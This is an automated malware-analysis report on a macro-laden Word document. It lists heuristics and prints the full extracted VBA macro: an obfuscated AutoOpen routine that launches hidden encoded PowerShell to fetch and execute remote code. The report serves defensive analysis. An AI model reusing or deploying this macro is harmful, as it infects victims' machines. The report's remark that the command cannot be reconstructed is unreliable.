Verdict: MALICIOUS
Risk Score: 110

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample is a Word document containing a VBA macro with an AutoOpen subroutine. This macro constructs a string that appears to be a Base64 encoded command, likely intended for execution via PowerShell. The macro uses string concatenation and an array of characters to build the command, which is then likely decoded and executed. The specific command is too obfuscated to fully reconstruct, but the presence of 'System.Text.Encoding' and 'ToBase64String' suggests a decoding operation.
Heuristics (5)

- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Potential Shell call in VBA (critical) OLE_VBA_SHELL: Potential Shell call in VBA. Matched lines in script: `ET_QJ = ET_QJ + BR_TF` / `Shell$ ET_QJ` / `End Sub`
- AutoOpen macro (low) OLE_VBA_AUTOOPEN: AutoOpen macro. Matched lines in script: `Attribute VB_Name = "remi"` / `Sub AutoOpen()` / `Dim ET_QJ As String`
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5896 bytes |

SHA-256: d3108f6d07df4ddc4dea470985aeb78fa7746fc7103c8045edc265ccf6793645
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "remi"
Sub AutoOpen()
Dim ET_QJ As String
IQ_KC = Array("p", "o", "l", "-", "r", " ", "s", "u", "x", "i", "d", "h", "y", "e", "w", "t", "n", "b", "a", "c")
Dim AM_SJ As String
AM_SJ = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
ET_QJ = ET_QJ + IQ_KC(0)
ET_QJ = ET_QJ + IQ_KC(1)
Dim HO_TE As String
HO_TE = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVAB"
ET_QJ = ET_QJ + IQ_KC(14)
ET_QJ = ET_QJ + IQ_KC(13)
Dim BT_PI As String
BT_PI = "lAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBV"
ET_QJ = ET_QJ + IQ_KC(4)
ET_QJ = ET_QJ + IQ_KC(6)
Dim JL_PG As String
JL_PG = "AFQARgA4AC4ARwBlAHQAUwB0"
ET_QJ = ET_QJ + IQ_KC(11)
ET_QJ = ET_QJ + IQ_KC(13)
Dim HS_TE As String
HS_TE = "AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBl"
BR_TF = BR_TF & AM_SJ & HO_TE & BT_PI & JL_PG & HS_TE
ET_QJ = ET_QJ + IQ_KC(2)
ET_QJ = ET_QJ + IQ_KC(2)
Dim CL_NC As String
CL_NC = "AHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdA"
ET_QJ = ET_QJ + IQ_KC(5)
ET_QJ = ET_QJ + IQ_KC(3)
Dim EK_MJ As String
EK_MJ = "ByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIA"
ET_QJ = ET_QJ + IQ_KC(14)
ET_QJ = ET_QJ + IQ_KC(9)
Dim IO_SB As String
IO_SB = "AkACgAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8A"
ET_QJ = ET_QJ + IQ_KC(16)
ET_QJ = ET_QJ + IQ_KC(10)
Dim AS_QF As String
AS_QF = "awBlAC0AdwBlAGIAcg"
ET_QJ = ET_QJ + IQ_KC(1)
ET_QJ = ET_QJ + IQ_KC(14)
Dim JK_RC As String
JK_RC = "BlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABz"
BR_TF = BR_TF & CL_NC & EK_MJ & IO_SB & AS_QF & JK_RC
ET_QJ = ET_QJ + IQ_KC(6)
ET_QJ = ET_QJ + IQ_KC(15)
Dim CN_SB As String
CN_SB = "ADoALwAvAHUAcwBwAHIAZAA1A"
ET_QJ = ET_QJ + IQ_KC(12)
ET_QJ = ET_QJ + IQ_KC(2)
Dim ER_QG As String
ER_QG = "DEANQAwAGMAZQBuAHQAcgBhAGwALg"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(5)
Dim EN_OF As String
EN_OF = "B0AGEAYgBsAGUALgBjA"
ET_QJ = ET_QJ + IQ_KC(11)
ET_QJ = ET_QJ + IQ_KC(9)
Dim IT_MB As String
IT_MB = "G8AcgBlAC4AdwBpAG4AZ"
ET_QJ = ET_QJ + IQ_KC(10)
ET_QJ = ET_QJ + IQ_KC(10)
Dim CQ_RI As String
CQ_RI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8A"
BR_TF = BR_TF & CN_SB & ER_QG & EN_OF & IT_MB & CQ_RI
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(16)
Dim DR_NE As String
DR_NE = "dQBzAGUAPwAkAGYAaQBsAHQA"
ET_QJ = ET_QJ + IQ_KC(5)
ET_QJ = ET_QJ + IQ_KC(3)
Dim AK_KF As String
AK_KF = "ZQByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJQ"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(8)
Dim DT_RC As String
DT_RC = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIANwA"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(19)
Dim HP_TB As String
HP_TB = "mACQAUwBlAGwAZQBjAHQAPQBkAGEAdABhACYAcwB2"
ET_QJ = ET_QJ + IQ_KC(7)
ET_QJ = ET_QJ + IQ_KC(15)
Dim GT_PE As String
GT_PE = "AD0AMgAwADEANwAtADAANA"
BR_TF = BR_TF & DR_NE & AK_KF & DT_RC & HP_TB & GT_PE
ET_QJ = ET_QJ + IQ_KC(9)
ET_QJ = ET_QJ + IQ_KC(1)
Dim IN_QI As String
IN_QI = "AtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBzAHIA"
ET_QJ = ET_QJ + IQ_KC(16)
ET_QJ = ET_QJ + IQ_KC(0)
Dim AN_SD As String
AN_SD = "dAA9AHM"
ET_QJ = ET_QJ + IQ_KC(1)
ET_QJ = ET_QJ + IQ_KC(2)
Dim FR_QD As String
FR_QD = "AYwBvACYAcwBwAD0AcgB"
ET_QJ = ET_QJ + IQ_KC(9)
ET_QJ = ET_QJ + IQ_KC(19)
Dim FK_RD As String
FK_RD = "3AGQAbABhAGMAdQBwACY"
ET_QJ = ET_QJ + IQ_KC(12)
ET_QJ = ET_QJ + IQ_KC(5)
Dim JK_QC As String
JK_QC = "AcwBlAD0AMgAwADEANwAtADEAMAAtADAAN"
BR_TF = BR_TF & IN_QI & AN_SD & FR_QD & FK_RD & JK_QC
ET_QJ = ET_QJ + IQ_KC(17)
ET_QJ = ET_QJ + IQ_KC(12)
Dim FM_OG As String
FM_OG = "gBUADIAMgA6ADQAMQA6ADEAMgBaAC"
ET_QJ = ET_QJ + IQ_KC(0)
ET_QJ = ET_QJ + IQ_KC(18)
Dim AQ_OF As String
AQ_OF = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADIA"
ET_QJ = ET_QJ + IQ_KC(6)
ET_QJ = ET_QJ + IQ_KC(6)
Dim IP_NG As String
IP_NG = "OABUADEANAA6ADQAMQA6ADEAMgBaACYAcwBwAHIAPQBoAHQ"
ET_QJ = ET_QJ + IQ_KC(5)
ET_QJ = ET_QJ + IQ_KC(3)
Dim HN_TC As String
HN_TC = "AdABwAHMAJgBzAGkA"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(5)
Dim AR_TD As String
AR_TD = "ZwA9AHQAegBQADcAYwA4AHgAWgBoAHIAMQBzAGI"
BR_TF = BR_TF & FM_OG & AQ_OF & IP_NG & HN_TC & AR_TD
Dim HQ_MF As String
HQ_MF = "AdgB4ADkAZgBKA"
Dim GT_LB As String
GT_LB = "FMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEIAbg"
Dim FQ_QH As String
FQ_QH = "BsAGwAdQBuAEgAaQBmAEwAMwBoAHgAagA0AC"
Dim HN_TJ As String
HN_TJ = "UAMwBEACcAIAAtAEgAZQBhAGQA"
Dim FK_NA As String
FK_NA = "ZQByAHMAIABAAHsAJwBBA"
BR_TF = BR_TF & HQ_MF & GT_LB & FQ_QH & HN_TJ & FK_NA
Dim JQ_RD As String
JQ_RD = "GMAYwBlAHAAdA"
Dim DS_QJ As String
DS_QJ = "AnAD0AJwBBAHAAcABsA"
Dim HR_QB As String
HR_QB = "GkAYwBhA"
Dim BK_NI As String
BK_NI = "HQAaQBvAG4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4AdABl"
Dim AS_PD As String
AS_PD = "AG4AdAAgAHwAIABDAG"
BR_TF = BR_TF & JQ_RD & DS_QJ & HR_QB & BK_NI & AS_PD
Dim HS_KH As String
HS_KH = "8AbgB2AGUAcgB0AEYAcg"
BR_TF = BR_TF & HS_KH
Dim HQ_SF As String
HQ_SF = "BvAG0ALQBKAHMAbwBuACkALgB2AGEA"
BR_TF = BR_TF & HQ_SF
Dim JN_NJ As String
JN_NJ = "bAB1AGUALgBkAGEAdABhACkAKQA="
BR_TF = BR_TF & JN_NJ
ET_QJ = ET_QJ + BR_TF
Shell$ ET_QJ
End Sub
```